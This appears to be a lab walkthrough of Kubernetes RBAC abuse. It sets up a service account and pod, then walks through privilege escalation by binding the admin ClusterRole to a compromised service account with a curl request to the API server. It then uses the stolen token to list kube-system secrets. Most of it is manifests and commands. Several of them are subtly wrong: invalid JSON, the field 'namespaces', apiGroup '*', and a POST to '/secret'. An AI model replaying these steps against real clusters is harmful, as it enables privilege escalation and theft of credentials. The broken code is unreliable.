Skip to content

Create Over-Privileged Service Account

Over-Privileged Service Account

Goal

  1. Create a Service Account
  2. Create an insecure RBAC setup
  3. Log into a Pod as the Service Account and query the API 

Process

Create SA & assign it to the default namespace

kubectl create serviceaccount attack-sa

Create a Role and apply it

$ cat role.yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
   namespace: default
   name: pod-reader
rules:
- apiGroups: [""]
   resources: ["pods"]
   verbs: ["get", "watch", "list"]


$ kubectl apply -f role.yaml

Create RoleBinding and apply it

$ cat rolebinding.yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
   name: read-pods
   namespace: default
subjects:
- kind: ServiceAccount
   name: attack-sa
   namespace: default
roleRef:
   kind: Role
   name: pod-reader
   apiGroup: rbac.authorization.k8s.io


$ kubectl apply -f rolebinding.yaml

Create Pod

$ cat pod.yaml
apiVersion: v1
kind: Pod
metadata:
   name: attack-pod
spec:
   serviceAccountName: attack-sa
   containers:
   - name: busybox
     image: busybox
     args:
     - sleep
     - "1000000"

$ kubectl apply -f pod.yaml

Get a shell and pull a copy of kubectl

$ kubectl exec -it attack-pod sh
> wget https://storage.googleapis.com/kubernetes-release/release/v1.15.0/bin/linux/amd64/kubectl
> chmod +x kubectl
> mv kubectl /bin

Run kubectl against the API

> kubectl get pod

Modify RoleBindings

Goal

  • The privilege to create Rolebindings allows a user to bind roles to a service account
  • This privilege can potentially lead to privilege escalation because it allows the user to bind admin privileges to a compromised service account
  • To do that, we need to bind the admin role to the other compromised service account
  • This JSON file will later be used to interact with the API

Process

Create RoleBinding

The purpose of this JSON file is to bind the admin "ClusterRole" to the compromised service account: 

$ cat malicious-RoleBinding.json
    {
        "apiVersion": "rbac.authorization.k8s.io/v1",
        "kind": "RoleBinding",
        "metadata": {
            "name": "malicious-rolebinding",
            "namespaces": "default"
        },
        "roleRef": {
            "apiGroup": "*",
            "kind": "ClusterRole",
            "name": "admin"
        },
        "subjects": [
            {
                "kind": "ServiceAccount",
                "name": "sa-comp"
                "namespace": "default"
            }
        ]
    }

Apply the RoleBinding

$ curl -k -v -X POST
    -H "Authorization: Bearer <JWT TOKEN>"
    -H "Content-Type: application/json"
   https://<master_ip>:<port>
    /apis/rbac.authorization.k8s.io/v1/namespaces/default/rolebindings 
    -d @malicious-RoleBinding.json

Abuse role to list secrets

After the admin role is bound to the “sa-comp” service account, we can use the compromised service account token to list secrets: 

$ curl -k -v -X POST
    -H "Authorization: Bearer <COMPROMISED JWT TOKEN>"
    -H "Content-Type: application/json"
    https://<master_ip>:<port>/api/v1/namespaces/kube-system/secret